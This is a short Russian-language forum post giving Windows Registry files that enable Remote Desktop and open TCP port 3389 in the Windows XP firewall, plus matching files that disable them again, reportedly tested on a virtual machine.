вот так будет точней Включаем "Разрешить удаленный доступ к этому компьютеру" через реестр: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" Выключаем: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] "fDenyTSConnections"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" Проверено на виртуальной машине ,работает